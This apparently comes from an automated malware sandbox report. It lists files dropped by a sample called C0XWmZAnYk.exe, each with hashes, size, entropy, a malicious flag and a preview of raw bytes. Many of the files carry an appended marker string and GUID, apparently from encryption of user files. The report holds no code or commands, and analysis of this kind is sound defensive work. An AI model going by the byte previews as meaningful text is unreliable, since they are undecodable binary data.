              SSDEEP:3072:Aj0bvH3ivZEkXPB2WwUx9hROR64+QsVAqcfIyOxt3uOFTwCsO/akDwkFG1N196rj:AjQaZEkXPB2BUBQI0bO9sOS2bFG1Irj
              MD5:B2F14347F55DF6ACBD47D26ACE77DF45
              SHA1:9DAD677E64F597C31EEE0BD04CE99618AE5CBFBB
              SHA-256:F9CEE67DE9721BD2FC817E626EB52157D46F0F0C4CD71A1F1A555072AD977853
              SHA-512:5CE1AB26896386AF0B21832C7F77BFE05219DDB451061D0AD05FD88CE7C956518FEBC75017BDCAC850A08294869FCCEA7A17DC327EF44E2CCB7B202467B2745A
              Malicious:false
              Preview:{. .&.aLP......_.F..-.......}.....~..s}..!:h$..K.........Z.Qs.Diq.D.........J..!...7....4,....Tg.q.....U.s.f~G,.~P..D_...*m.....<..M.A.%...X....I..R.an.q5.@..9T...}).\..q.I9....]!.U.&.B5.....}.XB.<.].ab..U..xD.r......+m..cM.R.d..]Z...C....SXFM.............."...%[jZ+...D../..-.S...ug.k..n...i.`...[.B-.<.p.K.j...@.A.8..f./.j.$-.[....*p...^.Gg.."h....j.G0..{....i[.M........<..=Hd.=.rh~.j..@oNl...!.....5...co{...P"...|.N3fD.V.zd..-.V--8....`72z..\.m....S.w.3].Y...~.W....ID,L....Q.h..[...!.....:.yrg.....?...+g^.\.{|Ost..S..}.| .. Vt.0....6..e+..J.2....Z.A!......lj.....=NM..&...Gc.4qA.by{....e3..<.4.&.G..K......O..9...O....T..K.NO..Oz.3y......B.,..T......l.f.I.N.J.9...........n..}.d...6.lU{.k.N~...9.o....).f*!...B..V.L.2..j....V}.S."...M......[b+.....S...Ah..)z.#..........A...j..O.DE<....[.c..\.........i'.:...)....*.F....}........[".......n..>..H...O..D...>C.d"..|..S.Q.L..t...I..Q*..pwA...;.<G....l...o,c.Y..K..BU....ri...yzmU .V.".....D.w.h
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):4729
              Entropy (8bit):7.965352251968604
              Encrypted:false
              SSDEEP:96:Tpj4QVrcoR36TqU+2li/ZK0l6toxh5/fszGA6rcExzIcTtYIzzc81X2YLIKjpY:Tpj12X+lBK0l6qlsiAQxzncUzjS
              MD5:336FB8F23573322C3BD70006EF307BB8
              SHA1:A4074133CBC11C62FADDCD011B1788DDD5C33079
              SHA-256:1F230EAE2CB96199F521F1964D6FD26571A00BFE9507FF37F095FEDF2131A12C
              SHA-512:F51F1965410AC6995DD3695A3A10D788640CF8275567B051E5015C573AA7063E206120CD1923204E4AFF59F074F3BB641E62909615BEBA0DC45961A0B6A6EA40
              Malicious:false
              Preview:{.."gj..C.^g......e.6.)..p.|..WBT.t..5..b.!f.....-c...5}...v.C.m..&......a..H..>..Nw.7vw..@...9..I.......e,?..y..|KZ....*L...M..x..3*.Y~..1..%.`.....H....x..h.MG.....Lf7.l!h%.3..{IRNj....B.......Y'..|.s.-..{6.I.......h...|j.R.<QIh..l.VG...#+I.X........@`L...}....+J.i..y$g..5......V3.~.i<n.l.^;".O.[..(..g.@......!...G<.7..&...N...V.<).4... vs.#...T.V.........<Q......:..l.Q.1b..c.k...E.....K.a.W..Z.q.X.T..Q...(...,.1._i...3.\..t<......Jh.@p|6..:.X.~..T.d.!uIs..L}A..........PY.a...r..$t.......]...1..-H-..].j[...'...m,.vt....g...ovUW..=q6..wEl....c.$7._.lM...N^.M.T!p.....]c..t...,...^.a.w....!..Z\.t...<z7.....)o..,......7H.+.....Xy..yj.HY..I......G+...w...>.....XI...xk?.Vb.&...].3.i...ufg.#R....U.1.(...+.l.$.i- i..Ak.i./c...X.Q.o.g....Q.^..V.6.E."..%.3.....S{}.0..x.b..$..>._?.o..............yG.C......O.^RQ<.P..1.N.4H1.U...lRq... .%h%k....:k|.a...e..R.J1....4~..7L....#r.13.E.q...:J........Z.7G.V_....?.<]..i(".`49z.:4.z...f....
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):400
              Entropy (8bit):7.372893072700665
              Encrypted:false
              SSDEEP:12:kvtSpQ6uOqOuUXkvcru33pH2gfTqAclcPdxa3cii9a:k1aQxJW00ru3pfnclcPd+bD
              MD5:95A0B3581D9E86EF4F5D63FEB89E5C99
              SHA1:98EF0A2F4807953401526E0C1869FCB9C410AF2A
              SHA-256:5A817F50F29CCB6216C9125A7ED1A013012B6C51CDAD9868CC7A957284BA81F2
              SHA-512:E6EE256C7E018D8E353B0E39B962F59304B4A13EE207E57E4ABF288AAA0D5B3ABCDFD01330871C644C9D749751FAF256886D0E40CC28BF527C6F6A4722B82942
              Malicious:false
              Preview:1.1ED.r.ev..0K.n...*..t....NX........zF...~..R.p.*..1N..S.u.4m&.......t_..VP.......&<.'..,..d.;gc.N....T..GK.....8J.L..>.\T%.J...o..[5@E...j..u.."..Bw....)es...R..Y..~RP3..#.)..^u...FU@.B.&...z.+.}...x.'iC;....:...%P...VUV..B].[j&..2.<...01.!.....8...%.*.2....;.?..5Ft......%Q...v&.W....5.#D...t...l.T...1..gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):452
              Entropy (8bit):7.420331576546681
              Encrypted:false
              SSDEEP:12:MSe8dOTYh5JEGuPXNml+5P1thdqUWhNi1Esu7gLdxa3cii9a:MSrl5JEjvNml+RR8UKZN7ad+bD
              MD5:E83B1BC601AACB2526D4C26E4C66BD5F
              SHA1:B41924B0844B148A70863A2D2C3BCBA41A2B16DC
              SHA-256:92EB9677273B47D3AB44DC70E895602EF487C2C568AC26F2B4561BB6B4F92EF7
              SHA-512:961DF06EC939786350B8AA777901D8738BA969DF08ECCA597F3DE1D629364E532EDBFFC7A9090DDD0814CD4D5F9678885BA56B7C77DAE4544E1FAE5E04474936
              Malicious:false
              Preview:.{.c....732..n.C..(.-.X../..+..%.2A'.&4.........Q`Y.-... ...4..l....6.t.L.:..++\sk....X.. ....N..u._._..M..7...1.....>.........j'....R?....n.IY...:.....A.".......U,.K../.........kZ ...2.W.)$...#.Vv..0.j.,.w.;.Rz9..%o[.A..Z.$...c.w..dq..tg...FT.../v......0..).{.N4.[/..&.7a_..+.T........=.f^<....pW.2...\t...,....w.}cM3}.LsmD.l....hSV.;..o.8..$f]....u.....gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):534
              Entropy (8bit):7.5485146282938995
              Encrypted:false
              SSDEEP:12:OYuxD9GgVzrpGTotfcWZihyh4/Bdxa3cii9a:OvxbzlDXZiz/Bd+bD
              MD5:453EA58C16422F9A0A27A1E9C97B8E8B
              SHA1:26CACC6EE7F0A08D7AC6067FC49078634350BD0F
              SHA-256:9DB1ADC6FC5CBEC442F59AFAA69DAC1947D4DC3A2737AD5CEC4171D4A4E288D8
              SHA-512:6239D5878E2B3161AF3B97FD437E6172E45C1A67299D2919CEA8839D47AA46D6DE3499DD8959721A71B94E9A383BACD3FD85770711DF87C3BF547A4609812902
              Malicious:false
              Preview:{. ".M.'Y.LZ@.i...N.&.yL:`D...(\...g..cL...)../*.G.H`.N.@.......}0$AE....C.v.]./JC..w....b....+..F.}dB...3..I...'..O............OO4$..iT.....j .....V........&..(G.g...D)..Y.RMUv.W(,3|,....F.....Ku[@._..x....]...1..._..)...'G.gO]T".^C=..N...f..YJ...]m.3. D.U...,..WO.[...){8I'.Z!.6.9q..?..A..CC.{..1...4.$}%....JK......g...c..e.7..hUN.80.{49Tb.k.<.;x....IZ.N.0h..;....#~...x.aH.6.l..\..MdB.DuI3?.X&.....-q\.]....1_.+..." .B..q.zlgigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):520142
              Entropy (8bit):6.02935688675383
              Encrypted:false
              SSDEEP:3072:MNFBs71N3W51d4TDtS6iYoxegsMcqAEvFlqIboXitT/ukJM:iA3WwDwRYAeVMcqAEv+IH/M
              MD5:D7F6C1A3F4994B9F7E7EAD57A1ADBB35
              SHA1:72958618422E772679058E641BF96CD06F38238F
              SHA-256:36097D5C4F7CE8C0DA93ECD02B40C8E492BB253AD86455A4D064144188AA158E
              SHA-512:CEC7F44CF6154C17E531EFB94A16D4F185EFE6293CBDE82AF97CAD4E59C5B1E3A9AD12D215908EE042CED89647558BD4C680E88124BEEFF845510A523397A730
              Malicious:false
              Preview:{. ".qMf.*..9@/...ja... .M3.O.....5I...q..B.e.W....pq...]...xm...u..*..a^.@'.EwJ...@.aw.Y/.....a.....$N.t ...<.9Y..........2.4....T..0..9@.C.../..\.......p.....5.,5...(n.....Q6.L.I2.a.f@.o...\..U..'./..DH...r....%L. v...r.!.&..;k...5.I..iN.j.,.^..........O...bA....o....qH=a....g.@~.Z6..M.o.k.I..oJ...G.z..../-.F."..v..<D...!N.7.z....'&.Y.@..5..7cV.... ..J'....{/...I..A......f....P.[....}.....e.G..<..`.e...0....;,....E60.F..x*^.~.U.ih...r..]^R.+././;?.{L....~dM9.r..L..82....n<M....K7..4......v)m...@Y'..]..(.....OcT.7.kK}^<.."4.8.$I..5.]....gi.1v.t...-.U.....}..$z.>g.$.8|.r.5I..>m....IF.JB......2.3F2.....t....kq.....1..U.i....yB.......^.%.....].....O..Mv<.........{..5.0...&I.us7R.[)...`.>..E.'...";......j\..^...a.|..K5...Z$.Y.....(".f..y.0.x.4(..&..e..<..:.B_.3.t.KR.x...u...>NV..s.7v.R....b..c....a&.i.dG..Wa.3.u.w.7.fJ.../..n^w....<.9HMd..x......Xw..R......5e.........#O.K.h..n.].&7.L....z...N.....2.e6....v.B.._..q.]y.0.M....s$.3(.K..\......PS...Y....[..
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):4194638
              Entropy (8bit):0.5184185356941595
              Encrypted:false
              SSDEEP:3072:5i1uMIoRa6pW7KHJquTcu6jRhN/dLUUCoW8tOfxlQrUzOLw5aM+N7mwiP:euMIoRtW7KHJqu4D1IQrULbP
              MD5:5D751A40816B29754F23EDE99B5DB22B
              SHA1:C7967F55E3301C0D2109F28CC5A33078598A06E7
              SHA-256:C4F154E3315635D155EEFDA19DB793238E86392FACE378B5E590FB9B63CA686F
              SHA-512:E89BD4F8E11F32120B5005A407D50C878B0285F23697EA2BB5AD2D81741114E749EAC4AEE863B4147D21F17443D7BEF3351FEFFD230793DA3198D623FF125CB7
              Malicious:false
              Preview:......f...a..'...z..i`.[.d.2......cT,..P.W.qT.|..&.#._`..B..d7.?....8?...,..v..b.O.Q.N.3A.A....~..N....mJ..z.Q.I...5..U...`..........g.-.u(x......"..]..k.......,..$dh..)r....._.)..9...).H......y..iN..C.F....E.........e.(.2./..C..|....~)^.m[.Nd.(@......=.....[...K..'[..6.o.W.=%.e.rzF....>q.|d.>].p...i.....}N.*e..]e.u....G......K..b..g...`.T.../$..`q.%..0<..V|f.f..)}......H.f3."..bcm#.A.Z.0`...+M.#&L%...3.BDW..L....q.....H.D+.(tR.N{..te[..F...T....8..q..[...H..2.....+......J2.I.....:.U.e7,...w..`.P...~=-.A./..=]y.o.E%.e...~...\(h.d.......3.9.V...X.m....4......#.o..oy..G...o..#>..4.jW..+]V.^.[A..<.......TJ.. 4...IeX....)..U.....s......9..[....j..q.>.U.U'.|2.m..T.YAy.......u{..p....jh...|4E..t......0..s..5.tU.z.pr.xW,..n.fo...E ?.E(%.....1s..S@.".g..3.t.....\......2.p..u.."..R&.\..OA.ue. {_..5.v.|.W}6..<.....ax+?Ib..T..k...&.....r?9.7....7*..UU..g...b<.Nx..4>K..veoaW...0.!._....7.....xx.V.U-._rQ..\...!%.P...ypyr.OL....`.hE.,.H....q
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):400
              Entropy (8bit):7.335658027528784
              Encrypted:false
              SSDEEP:12:nz7obKQlgNsW8rpFAQmI3/LjUPydxa3cii9a:nNQ7nFAQmYLjUKd+bD
              MD5:497D823100F758FDA33AF47278B8A9A1
              SHA1:DF0A6F9F92098AB87421EA2AA71D02A6B60982E8
              SHA-256:EB4FBA248EE077D7C3099914BB6B027966FDB019ED628C104D9A63C11FD32756
              SHA-512:FF2F5D0D9E5F820ADCA383794ACB367AF27C0DCB28B055F969B2CB177D89FC459CC089E388DEA8ABBC2EBFA6670EBF0586D44E4C8DD0E5F2EE5D3E2766BD77D1
              Malicious:false
              Preview:1.44Cl....`.|...HQC7....W.$.i.D.K.8....x+..O$..n..L`+.?=....Bq....,D..BmBL&D.G...gq...\.........H....U~X...b..$....c.....}...o...+k....).0e..m.....C.K...d....3i.W.,'.\\/.I..`....-...p.h1L2B~dID,....Or.j.].ET....b.l%..B...I...$p"A.j.|...K.....{N0..T&....;..o8m......UK=.?.>.R....qaR....g... 4R..4..N.K|..8.".U..gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):447
              Entropy (8bit):7.426498997120537
              Encrypted:false
              SSDEEP:12:NLPAgTlDoLWwqRJgX/vrzg0XZIoHAdxa3cii9a:igQXqszg0XZTAd+bD
              MD5:DA7554E796CE3BF19EE2EAB7B7E722B3
              SHA1:A63859FE2E69E4A114440029D3FFC248AC8F7A65
              SHA-256:1D36A10BFCB08C56EE8333EA532B137683A07086620030CD719C21BBA79E411A
              SHA-512:2BD4785E64B90E48A1796B868E7011E5CC0DCBD5A6DB07A1455E4553E7CF6B29CA70AD9637099CBB71E0F3398E742B5AFE7998C8819964D2C816C527E7E0E4C4
              Malicious:false
              Preview:{.. m."}c.b........&-)n.....A+9S..J....R}}....7!..Nq....r.}Sb.u.Tr.L..n...`...\..N..R.......s}..G{&@...I4..2..tZU=.B.....K..|1...H..t.c...m...j.=!N....-.......... *g.4ax..a!.4..m.su.D.g..'a....9..vF!...uW!|}..8........U)......'..l.....Q..,.....,..7.*.h..p..HKb.U.6E.v.B....1.....S..[.....2./..B..J..h: z%+.X.Z..^TO.S...\c...4..s..b.6..z..<&ggigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):33102
              Entropy (8bit):7.994229381694411
              Encrypted:true
              SSDEEP:768:hDyhWL10wKfkIi1V2BdXcqGfY1Si7S4rUHtUYcstYYn:p10nmV2D1oY1Si7S4AHIst7
              MD5:3F2488387169E488F3D775B287C04A2D
              SHA1:B99612798CEBCCF2BE288219B9AA8D1744E8B864
              SHA-256:6C1ECB1E2F017A75AC06EBCA33B81FDF823FC02F30A2D3B032898C96E7CD66DB
              SHA-512:E46E0B166D209063687BB8F36BEB5B199F3240BB81C5B6E056116EF940098DDBEBAA94F4108001EA284EE0F717B889FFA18C39600F6C3272C740652EF02C905A
              Malicious:true
              Preview:SQLitm.........t....M.x*(q..j.)x........e....%......`].`'.R......V..c."....n...D...S.....~..C...h....3.hsl(DE/.,s...).{..|.d........)c..?.e/.z...U ..d.8=U..+rf.#.i.}.7..I;..^..!(....g.\7...n$j..q...l.b.]c=.EO.X.F.:.,...I.P{.....Yq.#....,......f.......&...X.6..k?P.0.k.3..<.....d`..0...hG.5q~l....|..S..........[.@.a........ZA.9.3F.........23|...Oh....n..T.[.a....Rq.|..!8L..L.........}..R.. B.C5K."....Y.,.m.P..h':..!......g...x.6.uv..S...Gfm.VzM1.d..|....."U..4b.+l....(,d.....]....zd.;...E..0...].v....&.....\S.F.-....A.0.s..-`g?.W..*......5...W..".......8...3.d.(..g.......O....<.1...:'(?..]..y..I...|;.c+.yc=(8.).^....<.n*e..Q..w....O']gW-.p....*xE..3vE.G.J..)~..........Wc.e.....m..{,CA).d..0j..@..@.4PNOV#....Q&X.:.8..$...yJ..c.....n..6.<@..~^......>....?.l.N:..cg..*.,U.7...&....M:,..Re...O.6c..3be.!._C.=.%No ..4u~.\......7.I..#e...Z.|..b.../................=..X6!^...[.......U.<..1..S2...&...p.k.iD/m...f....&K..?$.......(H.jY.....
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):20814
              Entropy (8bit):7.991066888502044
              Encrypted:true
              SSDEEP:384:ci/AOzpyCarXEGscfkYoBVxRA6XeRPXyPFfo7rppyAM4P6DLh8JOVK:ciVzpHazECkrjxR7XoydA5pBvmK
              MD5:46EEFD4DC01F75D8BECC6A78E1205FBE
              SHA1:08EC10E1506FC41D461DA691B8367654239CB3D9
              SHA-256:58F0A3019473B255B471885AEF440CC76BD48B7888DC114D5FB60B8375303343
              SHA-512:8E58CE95626DBBD58970C32A5DC53AC28A60E3004D2191C67BC56B3C186869A67A59DB02F571F85BBCE703D632D9F7652D99A897632E0911D0D78CEE984B4A6F
              Malicious:true
              Preview:SQLitPC. ...'-sP.C.w.......r2..u..k@n...7.3*..4..{ ..!T.=...w.P...@..8ZXR..91G..`........Ei*N:.So....n....j.....$.5@[.D.cy.|-...7H.<.aF..".N...S...........BsQW._.....7.>Jli^..xl.uz.....o..m+.-....z......W.......$.N<Qy.D5e...Cw.R.]H........X...,.J.e..LE.HDvm".....`..i....z.....{.L_..dH..e7..^.Nc.....q1c..#...2..s..P.%p....)..m.N.....(..4,.^..._.."......A..'.]f.y..ds..G+u.J.2u...9.....W...Vu.W7.Y.<.q!1........ay.LC.......:/rA.Z.5.=w .(j..E..1M..)WV....fG.....A..Am...wJ..9.F..J.%`......w'X.TE....Py.o5..*....,....&....7D.6j...>....L8.<..;.W..e...cw.s.X./.Y.O!.;....Ew,0...&........f..6...,..[......eC.....;E,.......9......e .!J...o..a.k..YR..m.B....u51..-).....P.......IN\g.P.2.....[l[i..=Z.....,...!,X... ....u...'...M=...g....0g.Z1...m#..=pI..y..q."....s.<....9.S4.\.?vM.I.c=.I.d..t....Z..p..M.....(."?...*(...'......#.r...v>.y%90.2..H..j..a....m..........o.....a..8.m.-........rU..m<....-NO0.*....=...Eos...Q.b.U"..%.{_g......c...% ....Z
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):543
              Entropy (8bit):7.616806560239546
              Encrypted:false
              SSDEEP:12:qHykQEbgI0sx5TBc/T9ub3aypayVcD7EudiyKeWu5dxa3cii9a:aykyI0up0T9ub3aqck3eWu5d+bD
              MD5:55D95CE55F7258D86A81A1A870EBC7D2
              SHA1:CA830DB07D7F2FE62BF25BC9FC781BB6553BB42D
              SHA-256:A112B75A3F2D96610DDDFD1704816FEE1080FC63F9AB2C55A17AB30B8D3E7C69
              SHA-512:7DE799DBA12C3A6EB69D55C118D559092527DABEB62E2D23C80844BA74F949C0818DABFDE5AE5D1EF6AFF4145C3FF8365ED39B4C657D55B4A7873A1D2CE29A12
              Malicious:false
              Preview:.f.5...t...8......../.......<.EA`.l.).F.M.*..Uc...\.<..~.....uM.l.....T.....\.?.V.v..`.;...C....c.C.@..?.L...d..$..1..^.v...f.n........O.5.kG=....E.z..dKx...h.%..CY.......'.W..s..?.[.7.e..v..,0..]....I)...R/l.+...do.....8..6...OOq1...7.M....0....u...a}~..U\:...J..x..~.UP-..i.uN...!a..y.........%w...6H?j.AY.....p.r.q.4.H...a.t.H^..v.....4.vC...O;...$...L'.J.........W....a,.i.p.%L...e...?o..Y...s....2.......O...X....'/".e.jl[.[A...E..]zt.gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):617
              Entropy (8bit):7.609786736443646
              Encrypted:false
              SSDEEP:12:kqj9PaeGMnA9RRa8oq9Jz+9UL1KKsjD87lkJn71uQtHjV1Kdxa3cii9a:FjRRGMoRaa9Jz+9ULIjDfJn7FEd+bD
              MD5:3AB1EA4873F17DA56AC826515037DBBB
              SHA1:2344F3CF84C9588DE0229C67DA5ED188E68BC9A6
              SHA-256:55C647904878F113C8925E2BD276EDED49B9607DC28CC91B11BCF771FAFE58D0
              SHA-512:512226F9B2C0EC209ACA47C5486945C718A67600953B672201197B297D2C2FB7D721237F9987D8F0AF8DE48378964315EBA776C6C9ED5FCEE201E17CD5C08CFA
              Malicious:false
              Preview:2023/.fM=.9ua.D..F.l.2...Mm....<...s...:..z.,"w%X.U.(CN...W.P..|W( ..k{..t..|.i..c.,b..G.%..g..UD|.'........X_.|(Q.h7...I.{..07.L..9.G.7.+.v.u.PV.rBX.6..q[[...R...|/..@,,....{H..h1\.c..C......F...t.......E....m...@.IO.`.....:....O...q...-.hn....E`C3.7.`.......&...O"G..b.........i...|..AaW..nD.(..r..+........@.........cb@.n......N...W......i.kj@;....}]t8%.......... p....=.s.0...b].g......>b.......;9$.7t.+&..;&o.Z. P..;...........$v....e.+i..e.....>...6.U.....*.......%.....J.W}*].k.H..h2.[2...O5.6..4D_1MHY%{.i...;gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):543
              Entropy (8bit):7.5643694870859335
              Encrypted:false
              SSDEEP:12:qsY9+gI2Ctbk7pzj66gHMYf1fiXUQT0/83x33gpFn174dxa3cii9a:NlbKJgsOiEQTW8p3gpF1Md+bD
              MD5:70774760A8F33B753F23175BF6D58B29
              SHA1:28A2AA2F51CA842FFF9565A0B5CC4F0F0CDFCAC6
              SHA-256:B398161B51002D1B7D68151363D37878083CE36D1BD6F8D89A43220C37F5473E
              SHA-512:5FEFD4AEA0EFF2D0701BECD9AF04DDA79096C1EE185E87EC9CCD161655816C7040A30B2CEFECDB0C62A85B7B43094FF311E215C3A23DAF3C04FBA0A813681E5F
              Malicious:false
              Preview:.f.5..:~n...;n.=k.....u.L?XQ.{....@u..?..7?St..s..</|.........^/d.9*...e.4S.:F_}S.sM....n..Nz..rJf-.?G...<..\mRw..Z.....'..q{.&m..f........D$-J..N.6......N.v.Z...8..e....[..O..P..aI...L_.8..[...`i...0.nA.&P.|....6n.z.....X...1..;..}.f.X7Y.yO..P.K.D...-..l...:'...........j@E..>H.....RK.'+.k..@=.]j....\P..2..u.....r.K....^..B.[t.{.....v$7.^9lU...P5...c.H..8..<Y.<../]............J...o..XM.U..l.......@.&<y..J...H.#.....W.....^u.].dT'..x.O..a!...WgigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):621
              Entropy (8bit):7.608146229797581
              Encrypted:false
              SSDEEP:12:kyiOpOgwqf8Duu/wdJfIedJ0tWBL0EG0N1ymuOs4vHdxa3cii9a:UOpOq0DzwdN06JG0N1yhOs4fd+bD
              MD5:9F941295698D292C2E190E083A780427
              SHA1:969DF4F4F06B58CBE94E029227BA5F76794338C8
              SHA-256:74135CDD209CF612E0642EF04C9972ACE0B78E9FEB2F63FF29D4A12DDBE7E5FE
              SHA-512:376E439C9369236782F5474F1671AF472E1D75EAA34373FC68329607369AA6D19CB49994087135C8680E5F6C08E982FC7DFE96340290960B2D18AF9A075596DC
              Malicious:false
              Preview:2023/|h.5..#......m....J..%^....6Z...M..4.t.h.o.m....~.'..Z1n.v$....aR..'.u..A.J........6...34.M.Q....6-=.-3.0.%S...A.W..x"..P....M. ;3[7.v..+...s.}..$.d.q..zf:..L..{.....H.;../...../#zC..(.XV.i.ZO.s.<(-...^.z..D7o..... ..R.~8n>.n.@..v....Pk...Vus;..Ww......Ce.......^.7..*..#...3O...pW...B.......P.....vU...Y.:.....e..J...(#...B...2.G.....(.z..K.....K."?..r..!...xV/...w.y.7Z).E...L..d..R.T..........H....fk.L...vZ..P\^YL.]..(.HqC.T...=...X...v.U\...PS..g...x..0.Fl.v...:......0....7_...$.(4.....".Xf.....}..q..t..Di..WG.A.gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):961
              Entropy (8bit):7.7624958962157145
              Encrypted:false
              SSDEEP:24:u79nfvrnSXXLZiieQyKx76S9V5QFNK5zIqmd+bD:YfvrnSXXLZx16S9yZqY8D
              MD5:ABD56FE414CE33D6832D548E52769AB5
              SHA1:BD69462A9B224B7FE89AA35A8B2E92DEDDFA3AF5
              SHA-256:22B3F3BF4DC1A804D4B306CFA822F7041D052156995A76266F3A30D87BA8AAC8
              SHA-512:B24288F8834B43F69ABA2A3A36091D65DD17875598D5CB2457C34B1579815FEA5FE5100C61C4A7A8D46E9DEDCFB37AAF6315BC7C1C93089664C71C5BBEED70EA
              Malicious:false
              Preview:.f.5...K.........S....;Q...?B..\.V....H.)'MP0.\......N... 5..q..0....9&o.IK..F:$B...J...K9\Y.M......-.W...GHTN.9\..Aj.3...x....^.K..D~.Jqk..W9+6\l>.T7:.Wi..8...oAW..D...BrJ....M..9.."...).....9.\#.O...;...l.QEQy..v.....{..u....ya....t..n.]s.....M`.9....Z.U....w.6w&m..Cr.K6...*t..o....M%{k2f...m.%oa.....O.>g......).1.q......=.`v.......T...4...H..<....k.Z.=o.5....+"\.N...Q..........L..i{X.<.DC7s.....0....s..7..o...1.5....@...?'.....X.;.~.).8.5......a....]......R..C.c.DT......Su.... 0.A.>..[......ah@/X.;.3U.F..u.T.d&m..;&.8.T...n..y.:.o....$B.Wz..*..R...Q...i..)......c?.......j..c.3r....X.}..Q...O_c......k..x).uYt\...A.........ybJ..4.7.ks..$..3.X4..$..?..|.).!..K.[.z.?..x..-..oJ....&/%...C..1}.=c.y@G..x[X.....uW.O..Ts....p...t!..xv.........On....$...z..S.?..'Q..._O:....."....a.)....!.x...;"..&j.@..n...V.}/N....$.hz..;.gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):655
              Entropy (8bit):7.694983146825287
              Encrypted:false
              SSDEEP:12:k8EvCBBrh/Bf5ZJcNojiyDkRnEuCdwqPhynzLy/w1iRo8Td7DxZrNiAydxa3ciik:GIph/Bf5WyitCWignzLy/wE0pd+bD
              MD5:F3406279AFE871C2DBBDE74107EFE377
              SHA1:D253CF799711072AC376032F1CCE40D503BEFEB3
              SHA-256:764D957E425EE10CB46FFE9B1B10AC9E38BDD56640FC552E5DE4AE770A890F50
              SHA-512:7D0618FFA2BCFB09F2BA7888ABC38AFD8415AF7C2506AED5CD83CFD459E88DC3F81398CB34005233F1BABF486156E245E8BF5E624DE00597D1169BE3891B579D
              Malicious:false
              Preview:2023/6..+.3.d..v.........<)..1.d8V"1a[l....Iu.........{C;....sN..h.g......)x.{%....1.Ll9.GU...e..y.r....-......X?.:U...;.....oq....3...H...J......f.....H..dr..`..I9[..~...Q.@...&..:...4E..[....1...,3.M...(m....r.z....#.i.yT..9M.:..^..#a.{....x.I..,qe......S....!....2.tE...q.?.A....0`..L.}..... $~r|j..zKQ..UN..C;....om.9.w.....+.A..[...-G..t....m`k.&....<y..]...N;w....W......o.S..E.1v..w'$n.?..J<...]..C.&n?..5.` ..[.m...P\o./l....,..2G..z.6......:.#S.....0.H./q.g.....]J.....xf.&.....k....C.*...C..R...\)....X.q....../m .s2.:.q....N.....`....s-.gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):5316
              Entropy (8bit):7.9642879752388795
              Encrypted:false
              SSDEEP:96:5MoX17SnEWOZLLpnR7iKjl1p7VC4R1fAhLUB83w5WT6txRmhV41t0SUiMZq:5M+17gUVliKjlTVJ9A+B83ktxRi41t0w
              MD5:8F45D16C7418A36F08C897CDB0A7471C
              SHA1:476785926B41AF6C0EBD46FFB81610DCF2D78B46
              SHA-256:7936C4B85B6C16AE0D00F4DF246D51D2D01555071C121F5874792BC30516F4CA
              SHA-512:CE235E9A34DE549946F8C4088F3065EA86E0EEBBDDD278863DC774B814101165B49A4FCCD8755FD1E6EAD22812BC1D0458DCC0BB9BD15C313913E4DDBD0D448E
              Malicious:false
